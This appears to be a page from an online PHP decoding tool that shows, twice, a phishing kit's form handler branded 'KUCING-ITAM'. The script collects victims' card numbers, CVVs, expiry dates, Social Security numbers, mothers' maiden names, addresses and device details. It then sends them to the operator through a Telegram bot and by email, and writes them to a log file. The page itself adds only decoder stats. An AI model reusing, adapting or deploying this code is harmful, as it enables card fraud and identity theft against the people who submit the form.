Find this useful? Enter your email to receive occasional updates for securing PHP code.
Signing you up...
Thank you for signing up!
PHP Decode
<?php include '../config.php'; // Function to send message to Telegram function sendT..
Decoded Output download
<?php
include '../config.php';
// Function to send message to Telegram
function sendTelegram($message) {
global $telegram_api_token, $telegram_chat_id;
$url = "https://api.telegram.org/bot$telegram_api_token/sendMessage";
$data = [
'chat_id' => $telegram_chat_id,
'text' => $message
];
$options = [
'http' => [
'method' => 'POST',
'header' => "Content-type: application/x-www-form-urlencoded
",
'content' => http_build_query($data),
],
];
$context = stream_context_create($options);
file_get_contents($url, false, $context);
}
// Function to send email using PHP's mail() function
function sendEmail($message, $subject, $cardname) {
global $emailresult;
// Set the "From" header to use $cardname as the sender's name
$headers = "From: $cardname <[email protected]>
";
$headers .= "Content-Type: text/plain; charset=UTF-8
";
// Send the email
mail($emailresult, $subject, $message, $headers);
}
// Function to log billing info to a log file
function logBilling($cardNumber, $expirationDate, $yearDate, $cvv, $fullname, $address, $city, $state, $zipcode, $phonenumber, $cty, $dob, $ip) {
$logFile = '../logs/logs_card.txt'; // Path to the log file
$date_time = date('Y-m-d H:i:s');
$logMessage = "[$date_time] [2] $cardNumber|$expirationDate/$yearDate|$cvv|$fullname|$address|$city|$state|$zipcode|$cty|$phonenumber|$dob|$ip
"; // Format the log message with timestamp
// Append the log message to the file
file_put_contents($logFile, $logMessage, FILE_APPEND);
}
function generate_random_string($length) {
$length = max(1, min($length, 50)); // Ensure length is between 1 and 50
$characters = '0123456789abcdefghijklmnopqrstuvwxyz';
$random_string = '';
for ($i = 0; $i < $length; $i++) {
$random_string .= $characters[rand(0, strlen($characters) - 1)];
}
return $random_string;
}
// Function to get geolocation data using ip-api for ISP information
function getISPInfo($ip) {
$url = "http://ip-api.com/json/{$ip}"; // Using ip-api to get ISP data
$data = json_decode(file_get_contents($url), true);
// Return the necessary information, using 'Unknown' as a fallback
return [
'ip' => $data['query'] ?? 'Unknown',
'city' => $data['city'] ?? 'Unknown',
'region' => $data['regionName'] ?? 'Unknown',
'country' => $data['country'] ?? 'Unknown',
'isp' => $data['isp'] ?? 'Unknown'
];
}
// Function to detect device and browser from user agent
function getDeviceAndBrowser() {
$userAgent = $_SERVER['HTTP_USER_AGENT'];
$device = "Unknown Device";
$browser = "Unknown Browser";
// Detecting device based on user agent string
if (strpos($userAgent, 'iPhone') !== false) {
$device = "iPhone";
} elseif (strpos($userAgent, 'iPad') !== false) {
$device = "iPad";
} elseif (strpos($userAgent, 'Android') !== false) {
$device = "Android";
} elseif (strpos($userAgent, 'Windows NT') !== false) {
$device = "Windows";
} elseif (strpos($userAgent, 'Macintosh') !== false) {
$device = "Mac";
}
// Detecting browser based on user agent string
if (strpos($userAgent, 'Chrome') !== false) {
$browser = "Chrome";
} elseif (strpos($userAgent, 'Safari') !== false) {
$browser = "Safari";
} elseif (strpos($userAgent, 'Opera') !== false) {
$browser = "Opera";
} elseif (strpos($userAgent, 'Firefox') !== false) {
$browser = "Firefox";
} elseif (strpos($userAgent, 'Edge') !== false) {
$browser = "Edge";
}
return [
'device' => $device,
'browser' => $browser,
'user_agent' => $userAgent
];
}
// Function to get card details from BIN using the HandyAPI
function getCardDetailsFromBIN($bin) {
$url = "https://lookup.binlist.net/$bin";
$response = @file_get_contents($url);
if ($response === false) {
error_log("API request failed for BIN $bin");
return [
'issuer' => 'Unknown Issuer',
'card_tier' => 'Unknown Tier',
'scheme' => 'Unknown Scheme',
'type' => 'Unknown Type'
];
}
$data = json_decode($response, true);
if ($data === null) {
error_log("Failed to decode JSON response for BIN $bin");
return [
'issuer' => 'Unknown Issuer',
'card_tier' => 'Unknown Tier',
'scheme' => 'Unknown Scheme',
'type' => 'Unknown Type'
];
}
// Menyesuaikan struktur respons BinList
return [
'issuer' => $data['bank']['name'] ?? 'Unknown Issuer',
'card_tier' => $data['brand'] ?? 'Unknown Tier',
'scheme' => $data['scheme'] ?? 'Unknown Scheme',
'type' => $data['type'] ?? 'Unknown Type'
];
}
$random_string_10 = generate_random_string(10);
$random_string_15 = generate_random_string(15);
// Check if the form was submitted
if ($_SERVER["REQUEST_METHOD"] == "POST") { // Get form data
$cardname = $_POST['cardname'];
$cardNumber = str_replace(' ', '', $_POST['cardnumber']); // Remove spaces from the card number
$expirationDate = $_POST['expMonth']; // Corrected to match the input name in the form
$yearDate = $_POST['expYear'];
$cvv = $_POST['cvv'];
$ssn = $_POST['ssn'];
$mmn = $_POST['mmn'];
// Get BIN (first 6 digits of the cleaned card number)
$bin = substr($cardNumber, 0, 6); // Get the first 6 digits of the card number, no spaces
// Format full card number with spaces after every 4 digits
$formattedCardNumber = implode(' ', str_split($cardNumber, 4)); // Format with spaces
// Format BIN without spaces (just 6 digits)
$formattedBin = $bin; // BIN remains 6 digits with no spaces
// Get card details from the BIN
$cardDetails = getCardDetailsFromBIN($bin);
$issuer = strtoupper($cardDetails['issuer']); // Capitalize issuer
$cardTier = strtoupper($cardDetails['card_tier']); // Capitalize card tier
$scheme = strtoupper($cardDetails['scheme']); // Capitalize scheme (e.g., VISA)
$type = strtoupper($cardDetails['type']); // Capitalize type (e.g., DEBIT)
// Get bank name from routing number
// Check if the form was submitted
// Get form data
$fullname = $_POST['fullname'];
$address = $_POST['address'];
$city = $_POST['city'];
$state = $_POST['state'];
$zipcode = $_POST['zipcode'];
$phonenumber = $_POST['phonenumber'];
$cty = $_POST['cty'];
$dob = $_POST['dob'];
$mader = $_POST['mader'];
// Get the user's IP address
$ip = $_SERVER['REMOTE_ADDR'];
// Get ISP data from API
$ispInfo = getISPInfo($ip);
$cityGeo = $ispInfo['city'];
$region = $ispInfo['region'];
$country = $ispInfo['country'];
$isp = $ispInfo['isp'];
// Get device and browser info from user agent
$deviceBrowser = getDeviceAndBrowser();
$device = $deviceBrowser['device'];
$browser = $deviceBrowser['browser'];
$userAgent = $deviceBrowser['user_agent'];
// Get current date and time
$dateTime = date("Y-m-d H:i:s");
// Construct the message for Telegram and email
$message .= "CARD [2] :: KUCING-ITAM ::
";
$message .= ":: CARD DETAILS ::
";
$message .= "[#] Bank Name : $issuer
";
$message .= "[#] Card Tier : $cardTier
";
$message .= "[#] Card Type : $scheme $type
";
$message .= "[#] Cardholder Name : $cardname
";
$message .= "[#] Card Number : $formattedCardNumber
";
$message .= "[#] Expiration Date : $expirationDate/$yearDate
";
$message .= "[#] CVV : $cvv
";
$message .= "[#] BIN : $formattedBin
"; // BIN detected from the first 6 digits
$message .= "[#] Copy Format : $cardNumber|$expirationDate|$yearDate|$cvv
";
// Append AMAZON - BILLING INFO section to the message
$message .= "
:: BILLING DETAILS ::
";
$message .= "[#] Full Name : $fullname
";
$message .= "[#] Address : $address
";
$message .= "[#] City : $city
";
$message .= "[#] State : $state
";
$message .= "[#] Zip Code : $zipcode
";
$message .= "[#] Phone Number : $phonenumber
";
$message .= "[#] Country : $cty
";
$message .= "[#] DOB (MM/DD/YYYY) : $dob
";
$message .= "[#] SSN : $ssn
";
$message .= "[#] MMN : $mmn
";
// Add Victim Information
$message .= "
:: Visitor Details ::
";
$message .= "[#] Date & Time : $dateTime
";
$message .= "[#] IP : $ip
";
$message .= "[#] ISP : $isp
";
$message .= "[#] Device : $device
";
$message .= "[#] Browser : $browser
";
$message .= "[#] City : $cityGeo
";
$message .= "[#] Region : $region
";
$message .= "[#] Country : $country
";
$message .= "[#] User Agent : $userAgent
";
$message .= ":: KUCING-ITAM ::"
// Construct the email subject in the desired format
$subject = "CARD [2] :: KUCING-ITAM :: $formattedBin - $scheme - $type - $issuer [ $country - $device - $ip ]";
// Send the message to Telegram
sendTelegram($message);
// Send the message to email only once
sendEmail($message, $subject, $cardname);
// Generate customizable random strings
$random_string_10 = generate_random_string(10);
$random_string_15 = generate_random_string(15);
$random_string_30 = generate_random_string(30);
// Log the billing details
logBilling($cardNumber, $expirationDate, $yearDate, $cvv, $fullname, $address, $city, $state, $zipcode, $phonenumber, $cty, $dob, $ip);
// Redirect to a confirmation page (optional)
header("Location: ../thanks.php?success=3oufn23ufnioenfioansfianf-23g0n23g0egionagionag=-3gionweg2i3ng23890gjegklnsagojnafg98h23fionef");
exit();
}
?>Did this file decode correctly?
Original Code
<?php
include '../config.php';
// Function to send message to Telegram
function sendTelegram($message) {
global $telegram_api_token, $telegram_chat_id;
$url = "https://api.telegram.org/bot$telegram_api_token/sendMessage";
$data = [
'chat_id' => $telegram_chat_id,
'text' => $message
];
$options = [
'http' => [
'method' => 'POST',
'header' => "Content-type: application/x-www-form-urlencoded\r\n",
'content' => http_build_query($data),
],
];
$context = stream_context_create($options);
file_get_contents($url, false, $context);
}
// Function to send email using PHP's mail() function
function sendEmail($message, $subject, $cardname) {
global $emailresult;
// Set the "From" header to use $cardname as the sender's name
$headers = "From: $cardname <[email protected]>\r\n";
$headers .= "Content-Type: text/plain; charset=UTF-8\r\n";
// Send the email
mail($emailresult, $subject, $message, $headers);
}
// Function to log billing info to a log file
function logBilling($cardNumber, $expirationDate, $yearDate, $cvv, $fullname, $address, $city, $state, $zipcode, $phonenumber, $cty, $dob, $ip) {
$logFile = '../logs/logs_card.txt'; // Path to the log file
$date_time = date('Y-m-d H:i:s');
$logMessage = "[$date_time] [2] $cardNumber|$expirationDate/$yearDate|$cvv|$fullname|$address|$city|$state|$zipcode|$cty|$phonenumber|$dob|$ip\n"; // Format the log message with timestamp
// Append the log message to the file
file_put_contents($logFile, $logMessage, FILE_APPEND);
}
function generate_random_string($length) {
$length = max(1, min($length, 50)); // Ensure length is between 1 and 50
$characters = '0123456789abcdefghijklmnopqrstuvwxyz';
$random_string = '';
for ($i = 0; $i < $length; $i++) {
$random_string .= $characters[rand(0, strlen($characters) - 1)];
}
return $random_string;
}
// Function to get geolocation data using ip-api for ISP information
function getISPInfo($ip) {
$url = "http://ip-api.com/json/{$ip}"; // Using ip-api to get ISP data
$data = json_decode(file_get_contents($url), true);
// Return the necessary information, using 'Unknown' as a fallback
return [
'ip' => $data['query'] ?? 'Unknown',
'city' => $data['city'] ?? 'Unknown',
'region' => $data['regionName'] ?? 'Unknown',
'country' => $data['country'] ?? 'Unknown',
'isp' => $data['isp'] ?? 'Unknown'
];
}
// Function to detect device and browser from user agent
function getDeviceAndBrowser() {
$userAgent = $_SERVER['HTTP_USER_AGENT'];
$device = "Unknown Device";
$browser = "Unknown Browser";
// Detecting device based on user agent string
if (strpos($userAgent, 'iPhone') !== false) {
$device = "iPhone";
} elseif (strpos($userAgent, 'iPad') !== false) {
$device = "iPad";
} elseif (strpos($userAgent, 'Android') !== false) {
$device = "Android";
} elseif (strpos($userAgent, 'Windows NT') !== false) {
$device = "Windows";
} elseif (strpos($userAgent, 'Macintosh') !== false) {
$device = "Mac";
}
// Detecting browser based on user agent string
if (strpos($userAgent, 'Chrome') !== false) {
$browser = "Chrome";
} elseif (strpos($userAgent, 'Safari') !== false) {
$browser = "Safari";
} elseif (strpos($userAgent, 'Opera') !== false) {
$browser = "Opera";
} elseif (strpos($userAgent, 'Firefox') !== false) {
$browser = "Firefox";
} elseif (strpos($userAgent, 'Edge') !== false) {
$browser = "Edge";
}
return [
'device' => $device,
'browser' => $browser,
'user_agent' => $userAgent
];
}
// Function to get card details from BIN using the HandyAPI
function getCardDetailsFromBIN($bin) {
$url = "https://lookup.binlist.net/$bin";
$response = @file_get_contents($url);
if ($response === false) {
error_log("API request failed for BIN $bin");
return [
'issuer' => 'Unknown Issuer',
'card_tier' => 'Unknown Tier',
'scheme' => 'Unknown Scheme',
'type' => 'Unknown Type'
];
}
$data = json_decode($response, true);
if ($data === null) {
error_log("Failed to decode JSON response for BIN $bin");
return [
'issuer' => 'Unknown Issuer',
'card_tier' => 'Unknown Tier',
'scheme' => 'Unknown Scheme',
'type' => 'Unknown Type'
];
}
// Menyesuaikan struktur respons BinList
return [
'issuer' => $data['bank']['name'] ?? 'Unknown Issuer',
'card_tier' => $data['brand'] ?? 'Unknown Tier',
'scheme' => $data['scheme'] ?? 'Unknown Scheme',
'type' => $data['type'] ?? 'Unknown Type'
];
}
$random_string_10 = generate_random_string(10);
$random_string_15 = generate_random_string(15);
// Check if the form was submitted
if ($_SERVER["REQUEST_METHOD"] == "POST") { // Get form data
$cardname = $_POST['cardname'];
$cardNumber = str_replace(' ', '', $_POST['cardnumber']); // Remove spaces from the card number
$expirationDate = $_POST['expMonth']; // Corrected to match the input name in the form
$yearDate = $_POST['expYear'];
$cvv = $_POST['cvv'];
$ssn = $_POST['ssn'];
$mmn = $_POST['mmn'];
// Get BIN (first 6 digits of the cleaned card number)
$bin = substr($cardNumber, 0, 6); // Get the first 6 digits of the card number, no spaces
// Format full card number with spaces after every 4 digits
$formattedCardNumber = implode(' ', str_split($cardNumber, 4)); // Format with spaces
// Format BIN without spaces (just 6 digits)
$formattedBin = $bin; // BIN remains 6 digits with no spaces
// Get card details from the BIN
$cardDetails = getCardDetailsFromBIN($bin);
$issuer = strtoupper($cardDetails['issuer']); // Capitalize issuer
$cardTier = strtoupper($cardDetails['card_tier']); // Capitalize card tier
$scheme = strtoupper($cardDetails['scheme']); // Capitalize scheme (e.g., VISA)
$type = strtoupper($cardDetails['type']); // Capitalize type (e.g., DEBIT)
// Get bank name from routing number
// Check if the form was submitted
// Get form data
$fullname = $_POST['fullname'];
$address = $_POST['address'];
$city = $_POST['city'];
$state = $_POST['state'];
$zipcode = $_POST['zipcode'];
$phonenumber = $_POST['phonenumber'];
$cty = $_POST['cty'];
$dob = $_POST['dob'];
$mader = $_POST['mader'];
// Get the user's IP address
$ip = $_SERVER['REMOTE_ADDR'];
// Get ISP data from API
$ispInfo = getISPInfo($ip);
$cityGeo = $ispInfo['city'];
$region = $ispInfo['region'];
$country = $ispInfo['country'];
$isp = $ispInfo['isp'];
// Get device and browser info from user agent
$deviceBrowser = getDeviceAndBrowser();
$device = $deviceBrowser['device'];
$browser = $deviceBrowser['browser'];
$userAgent = $deviceBrowser['user_agent'];
// Get current date and time
$dateTime = date("Y-m-d H:i:s");
// Construct the message for Telegram and email
$message .= "CARD [2] :: KUCING-ITAM ::\n\n";
$message .= ":: CARD DETAILS ::\n";
$message .= "[#] Bank Name : $issuer\n";
$message .= "[#] Card Tier : $cardTier\n";
$message .= "[#] Card Type : $scheme $type\n";
$message .= "[#] Cardholder Name : $cardname\n";
$message .= "[#] Card Number : $formattedCardNumber\n";
$message .= "[#] Expiration Date : $expirationDate/$yearDate\n";
$message .= "[#] CVV : $cvv\n";
$message .= "[#] BIN : $formattedBin\n"; // BIN detected from the first 6 digits
$message .= "[#] Copy Format : $cardNumber|$expirationDate|$yearDate|$cvv\n";
// Append AMAZON - BILLING INFO section to the message
$message .= "\n:: BILLING DETAILS ::\n";
$message .= "[#] Full Name : $fullname\n";
$message .= "[#] Address : $address\n";
$message .= "[#] City : $city\n";
$message .= "[#] State : $state\n";
$message .= "[#] Zip Code : $zipcode\n";
$message .= "[#] Phone Number : $phonenumber\n";
$message .= "[#] Country : $cty\n";
$message .= "[#] DOB (MM/DD/YYYY) : $dob\n";
$message .= "[#] SSN : $ssn\n";
$message .= "[#] MMN : $mmn\n";
// Add Victim Information
$message .= "\n:: Visitor Details ::\n";
$message .= "[#] Date & Time : $dateTime\n";
$message .= "[#] IP : $ip\n";
$message .= "[#] ISP : $isp\n";
$message .= "[#] Device : $device\n";
$message .= "[#] Browser : $browser\n";
$message .= "[#] City : $cityGeo\n";
$message .= "[#] Region : $region\n";
$message .= "[#] Country : $country\n";
$message .= "[#] User Agent : $userAgent\n\n";
$message .= ":: KUCING-ITAM ::"
// Construct the email subject in the desired format
$subject = "CARD [2] :: KUCING-ITAM :: $formattedBin - $scheme - $type - $issuer [ $country - $device - $ip ]";
// Send the message to Telegram
sendTelegram($message);
// Send the message to email only once
sendEmail($message, $subject, $cardname);
// Generate customizable random strings
$random_string_10 = generate_random_string(10);
$random_string_15 = generate_random_string(15);
$random_string_30 = generate_random_string(30);
// Log the billing details
logBilling($cardNumber, $expirationDate, $yearDate, $cvv, $fullname, $address, $city, $state, $zipcode, $phonenumber, $cty, $dob, $ip);
// Redirect to a confirmation page (optional)
header("Location: ../thanks.php?success=3oufn23ufnioenfioansfianf-23g0n23g0egionagionag=-3gionweg2i3ng23890gjegklnsagojnafg98h23fionef");
exit();
}
?>Function Calls
| None |
Stats
| MD5 | 4b35b506c2731a6443a0065492803a33 |
| Eval Count | 0 |
| Decode Time | 57 ms |